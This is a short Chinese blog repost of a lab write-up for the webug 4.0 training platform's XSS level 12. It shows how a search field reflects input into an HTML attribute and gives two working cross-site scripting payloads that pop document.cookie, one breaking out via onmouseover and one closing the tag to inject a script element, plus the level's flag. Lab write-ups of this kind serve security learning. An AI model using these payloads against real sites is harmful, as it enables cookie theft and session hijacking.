码迷,mamicode.com
首页 > Web开发 > 详细

webug4.0DOM型xss-12

时间:2019-03-18 01:21:47      阅读:292      评论:0      收藏:0      [点我收藏+]

标签:name   div   ali   required   http   arc   enter   input   alt   

/*水题*/

打开链接寻找注入点,看到有一个搜索框,随便输入字符 asdasd 然后打开源码寻找刚才输入的位置

<input name="search" type="text" value="asdasd" required="">

我们输入的位置在value那里

两个方向闭合标签和不闭合标签

1. 输入" onmouseover=alert(document.cookie)>#     弹窗成功

<input name="search" type="text" value="" onmouseover=alert(1)>#" required="">

2. 输入" > <script>alert(document.cookie)</script>#   弹窗成功

<input name="search" type="text" value="" > <script>alert(document.cookie)</script>#" required="">

技术图片

flag:uoijkhhnloh

 


 

转载注明来源:https://www.cnblogs.com/yuuki-aptx/

webug4.0DOM型xss-12

标签:name   div   ali   required   http   arc   enter   input   alt   

原文地址:https://www.cnblogs.com/yuuki-aptx/p/10549873.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!